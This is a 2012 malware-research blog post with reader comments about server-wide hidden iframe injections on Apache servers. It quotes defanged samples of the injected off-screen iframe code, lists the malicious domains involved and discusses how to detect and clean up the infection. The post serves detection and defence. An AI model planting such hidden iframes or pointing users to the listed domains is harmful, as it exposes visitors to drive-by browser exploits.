msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

RFI: Server-wide iframe injections

   13 Aug 12   Filed in Short Attack Reviews

This post is a request for information.

This summer I come across some clearly infected servers where I can’t figure out how exactly the hack works and what should be done to clean them up and to protect other servers from similar hacks. So I decided to share my information about the issue and hope someone could shed some light on it.

1. The malicious code typically looks like this (this is what I see today, August 13, 2012):

<style>.vn5u66dxa { position:absolute; left:-1023px; top:-1209px} </style> <div class="vn5u66dxa"><if rame src="hxxp://insitudrill .com/46814443.html" width="199" height="288"></ifra me></div>

About a month ago the iframe URLs looked slightly different:

<style>.um6x1zsq { position:absolute; left:-1241px; top:-1283px} </style> <div><ifr ame src="hxxp://megaworlsnetscapes .info/?a=YWZmaWQ9MDUyODg=" width="120" height="300"></ifram e></div>

The code changes on every page load. The parts in bold would randomly change.

2. This code is being injected into random (or not so random) places in the <head> section of the HTML code.

3. It is being injected into both PHP pages and into static plain HTML pages.

4. We should be actually talking about infected server responses since the malicious code cannot be found in any website files.

5. It is pretty hard to detect this infection since only random server responses are affected. There should be some internal conditions though (that I couldn’t figure out yet) since Unmask Parasites has quite hight detection rate (still not always) while other tools (e.g. wget or online HTTP tools) rarely trigger this malware for the same requests. I couldn’t reproduce the malicious responses in real browsers at all.

detection in Unmask Parasites

6. At the same time Google’s malware scanners do detect those iframes. However their detection rate is not perfect either. Google unblocks sites where I can still see those malicious iframes.

7. This hack typically affects all sites on the same server. However it’s hard to tell for sure because of its intermittent nature and less than perfect detection rate.

8. This hack (in my experience) affects servers powered by Apache.

9. If you check Apache logs, you can recognize tempered responses since their sizes are slightly bigger than typical response sizes for the same pages.

10. Domains in iframe URLs also change every day or so. However I couldn’t detect the event that triggers the change.

11. Here’s a a list (incomplete) of domains associated with this attack.

  • judochatoutsiderugs .info
  • electroniccastingbankingetc .info
  • insitudrill .com
  • megaworlsnetscapes .info
  • megaworlsnetscapes .net
  • mig-generatio-nla-bss .info
  • mikao-usui-reikimaster-annet .nl
  • fuellttropasen .net
  • inwocementworld .net
  • blondbindsfeeds .org
  • mainsbigwoeld .net
  • jurymerlin .info
  • worldorgsrooms .net
  • worldorgsrooms .com
  • lawpeter .info
  • linesphones .info
  • signaccelerated .org
  • qmg2 .com
  • dorcel3d .fr

12. Some information about what those iframes do. Currently they redirect to hxxp://multiplechoicetaping .org/feed/xml.php?uid=45

I checked the final landing pages some time ago and found various browser exploits there. For example this: VirusTotal 9/42.

And by the way, “YWZmaWQ9MDUyODg=” part of the URL decodes to “affid=05288” — criminals like affiliate marketing.

Your ideas are welcome

Given all the information I know, I can only think of the hack that involves hijacking Apache process. It could be either “patched” Apache or some of its modules or some malicious process that intercepts generated web page code and injects iframes there.

A few year ago I reviewed two server-wide attacks that managed to hijack Apache: GoScanPark and Beladen. This time the symptoms are not exactly the same, but during the last three years this attack might have evolved. Or it could be something completely different.

As far as I can tell, quite a few servers around the world are infected and I hope that some server admins have already figured out how hackers managed to infect their servers and what should be done to efficiently detect the hack and clean up web servers.

Please share whatever information/thoughts/ideas you have. It may make difference and help harden and clean up many infected and potentially vulnerable servers. Thank you!

Update (August 15, 2012): Sucuri follows up on this post with more involved iframe URLs and some speculations on the attack vector (they think about a “mix of attacks”). Still no information about how it works and what exactly is infected.

Update (September 10, 2012): I have new information about this attack. It turns out the servers are compromised at the root level and hackers managed to install malicious Apache modules.

To webmasters

If Google reports similar iframes on your site (you can usually see the code in Webmaster Tools -> Health -> Malware) then most likely this is something that only your hosting provider can take care of. Let them know about the problem and show this article. If you don’t see much help from your hosting provider you might want to move your site to a different server.

Related posts:

Reader's Comments (10)

  1. |

    Can you verify whether these server still allowed 777 permissions (non-suPHP type servers)?

    Other common denominators like PHP version or Apache version?

    Thanks,
    Jim

  2. |

    Since the hack affects all sites on the server, it is worth looking at the server itself.

    Is a control panel (cPanel, Plesk, webmin, etc) used?

    Are the affected sites user directories all writable by one user (apache?) or multiple users? This distinguishes between a root compromised server, and some other random Apache level compromise.

    Are there FTP logs for the changed pages? How about Apache access logs at the time of the change?

  3. |

    http://en.wikipedia.org/wiki/HTTP_response_splitting maybe?

  4. |

    Jim, Eric,

    I usually don’t have access to server internals. And most of those servers don’t disclose versions of Apache and PHP.

    I worked with one dedicated server where there were only a handful of sites that belonged to the server owner and developed specifically for him (e.g. no third-party CMS or scripts were used).

    But I can also see the same problems on shared servers and I can see the iframes in most sites that I check (remember the detection is not consistent) and I can see it in static web pages and in CMS-generated pages.

    I checked Apache access logs but couldn’t find anything that looked like a request to a backdoor that would trigger change in iframe URL. However that was that dedicated server and it produces hundreds of megabytes of logs every day and this site extensible uses POST requests to multiple pages so I could easily miss something. I also scanned website files for know backdoor patterns and didn’t find anything (I wish all webmasters used version or integrity control, especially on dedicated servers, so that spotting changes would be really easy). So I guess I could be something on the Apache level.

    I don’t remember seeing FTP logs there (they probably only worked via SFTP).

    I hope administrator of affected server will see this article and will be able to answer the rest questions.

    P.S. If someone wants to see an infected server, contact me and I’ll send you an IP address (If I can still see the iframes there by that time)

  5. |

    Hi Guy,
    “eshopcoupons .com” hit with the following malware codes injected in most of our javascript files…..

    (Edit by Denis: I moved your code to Pastebin) http://pastebin.com/N2mrrfZ3

    Not sure how it get there but we took the following actions and it haven’t return for more than 24 hours…

    - Changed all password (admin, ftp users)
    - Use .htaccess and block all IP address that look suspicious (most of them are from Russian Federation, Ukraine, and Romania)
    - Removed write permission on all java files

    Question:
    Should I block all IP address that not coming from US and Canada ? This website had nothing to do with people that from China, Russian Federation, Ukraine, Romania etc. What are the change that major search engine bots are from these countries.

    Is there anything else I can do to prevent this happening again ?
    This site is run on Apache, hosted by godaddy share plan.

    • |

      Hi.

      This code injected an invisible iframe from “hxxp://www.minnepark .be/forum.php” but I doubt it has anything to do with the attack described here.
      In your case you should find the security hole rather than blindly blocking users. Most likely there are backdoors on your server.

      P.S. It would be better to discuss this elsewhere. I’ll be removing off-topic comment from this thread.

  6. |

    Hi, Thanks for all these information. My site got hacked a few days back, and I was scratching my head down, trying to figure out the malware php script. But, (as you’ve said), I couldn’t found any. Then I googled your site and was kind of relieved after reading this. Right now I’ve taken this matter to my host.

    And, I think, the code is injected after the first <script> tag under the <head>. This behaviour again made me think, is it a javascript which attaches the code after the first script tag? But, I guess, it is not. The code itself is getting injected right inside the head, after the first script.

  7. |

    bdw, the injection, I guess exploits recent vulnerability in java. https://blogs.oracle.com/security/entry/security_alert_for_cve_20121

    It downloads and runs a fake anti virus (which under windows 7 looks just like the action center). Although Microsoft Security Essentials has successfully been able to detect and stop it from the very beginning I guess.

  8. |

    Same here, just got infected and a couple partners too, all using PLESK , there has to be something in apache that replace the content of the first javascript file , that JS injects the iframe. Still searching for that freaking module , all the modules are legit … so some of one has to be replaced.

  9. |

    [...] wurde die Schadsoftware vom russischen Malware-Forscher Denis Sinegubko, der darüber in seinem Blog [...]